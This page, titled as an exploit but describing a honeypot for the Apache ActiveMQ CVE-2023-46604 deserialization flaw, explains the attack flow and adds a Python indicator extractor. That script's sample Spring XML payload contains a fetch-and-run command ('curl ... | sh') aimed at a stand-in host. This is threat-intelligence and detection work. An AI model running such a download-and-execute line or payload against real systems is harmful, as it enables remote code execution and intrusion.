
Exploit for Deserialization of Untrusted Data in Apache Activemq

honeypot.rs

Honeypot that targets CVE-2023-46604 (Apache ActiveMQ RCE vulnerability) and focuses on collecting Indicators of Compromise. This honeypot can be used in any Threat Intelligence infrastructure to obtain attackers' IP addresses, post-exploitation samples and malware samples. This information can help detect and prevent attacks in the future.

How it works

In a real attack, the attacker sends a specific packet to the Apache ActiveMQ service. This packet contains an ExceptionResponse with the class org.springframework.context.support.ClassPathXmlApplicationContext and a message that contains the URL of an XML payload.

[Figure: Attack Example]

Secondly, the vulnerable service downloads the XML payload, which commonly contains an RCE command.

[Figure: XML Payload Example]

This honeypot simulates a vulnerable Apache ActiveMQ service and extracts the attacker's IP address, the XML payload URL and the RCE command from the XML payload. This information can then be parsed from JSON. Honeypot logs can be checked at the logfile path that you specified in Service.toml.

[Figure: Honeypot Logs]

The honeypot also creates JSON output with parsable indicators. You can specify the path of the outfile in Service.toml.

[Figure: JSON Output]

Installation

The honeypot can be deployed on your own server (for example a VPS or VDS) as a Docker container.

Configuration

The service configuration file Service.toml can be changed to suit your setup:

service_ip = "0.0.0.0" # listen ip address
service_port = 61616 # port (default for Apache ActiveMQ 61616)
logfile =…
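The extraction step described above, as an added Python example that is not part of the honeypot.rs project: it parses a captured Spring beans XML payload, records every bean class and its constructor-argument values, pulls embedded URLs and IPv4 addresses out of those values, and emits a JSON record of the kind a threat-intelligence pipeline can ingest. The sample payload is constructed (documentation IP ranges only), treating java.lang.ProcessBuilder as the marker for a command-spawning bean is this example's assumption, and the JSON field names are made up here because the page does not show the honeypot's own output schema. Malformed XML is reported in the record instead of raising, so a single bad capture cannot stop a batch.

```python
"""Extract indicators of compromise from a captured Spring beans XML payload.

Added example, not honeypot.rs code. Assumes the payload is Spring beans XML
whose <bean> definitions carry the command in <constructor-arg> values.
"""
import ipaddress
import json
import re
import xml.etree.ElementTree as ET

# Bean classes whose constructor arguments form an OS command line.
# java.lang.ProcessBuilder is a real JDK class; using it as the marker
# (and this set in general) is an assumption of this example.
COMMAND_CLASSES = {"java.lang.ProcessBuilder"}

_URL_RE = re.compile(r"""https?://[^\s'"<>|;&]+""")
_IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

# Constructed sample payload in the shape the text describes; all values are
# made up and 198.51.100.0/24 is a documentation-only range.
SAMPLE_XML = """<beans xmlns="http://www.springframework.org/schema/beans">
  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
      <list>
        <value>/bin/sh</value>
        <value>-c</value>
        <value>curl -s http://198.51.100.7:8080/stage.sh | sh</value>
      </list>
    </constructor-arg>
  </bean>
</beans>
"""


def _local(tag):
    """Strip an XML namespace prefix: '{ns}bean' -> 'bean'."""
    return tag.rsplit("}", 1)[-1]


def _arg_values(bean):
    """Return the string values of a bean's constructor arguments, in document order."""
    vals = []
    for arg in bean:
        if _local(arg.tag) != "constructor-arg":
            continue
        if arg.get("value") is not None:  # <constructor-arg value="..."/> form
            vals.append(arg.get("value"))
        for el in arg.iter():  # <constructor-arg><list><value>...</value></list> form
            if _local(el.tag) == "value":
                vals.append((el.text or "").strip())
    return vals


def _valid_ipv4(candidates):
    """Keep only strings that are syntactically valid IPv4 addresses."""
    out = []
    for c in candidates:
        try:
            ipaddress.IPv4Address(c)
        except ValueError:
            continue
        out.append(c)
    return out


def _dedup(seq):
    """Drop duplicates while preserving first-seen order."""
    return list(dict.fromkeys(seq))


def extract_iocs(xml_payload, payload_url=None, attacker_ip=None):
    """Parse one captured payload and return a JSON-serialisable IoC record."""
    record = {
        "attacker_ip": attacker_ip,   # from the honeypot's TCP connection
        "payload_url": payload_url,   # from the ExceptionResponse message
        "beans": [],
        "commands": [],
        "urls": [],
        "ips": [],
        "parse_error": None,
    }
    data = xml_payload.encode() if isinstance(xml_payload, str) else xml_payload
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        record["parse_error"] = str(exc)
        return record

    arg_texts = []
    for bean in root.iter():
        if _local(bean.tag) != "bean":
            continue
        cls = bean.get("class", "")
        args = _arg_values(bean)
        spawns = cls in COMMAND_CLASSES
        record["beans"].append({"class": cls, "args": args, "spawns_process": spawns})
        if spawns:
            record["commands"].append(" ".join(args))
        arg_texts.extend(args)

    # URLs come from the command text; IPs from the command text and the payload URL.
    for text in arg_texts:
        record["urls"].extend(_URL_RE.findall(text))
    for text in arg_texts + [payload_url or ""]:
        record["ips"].extend(_valid_ipv4(_IPV4_RE.findall(text)))
    record["urls"] = _dedup(record["urls"])
    record["ips"] = _dedup(record["ips"])
    return record


def to_json_line(record):
    """One JSON object per line, ready for a log shipper."""
    return json.dumps(record, sort_keys=True)


if __name__ == "__main__":
    rec = extract_iocs(SAMPLE_XML, payload_url="http://203.0.113.5/poc.xml",
                       attacker_ip="203.0.113.5")
    print(to_json_line(rec))
```

Run it directly to see the JSON line for the constructed sample, or import `extract_iocs` and feed it the payload bodies the honeypot has fetched. Matching on the local tag name rather than a fixed namespace means payloads that omit the Spring xmlns declaration are still parsed.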
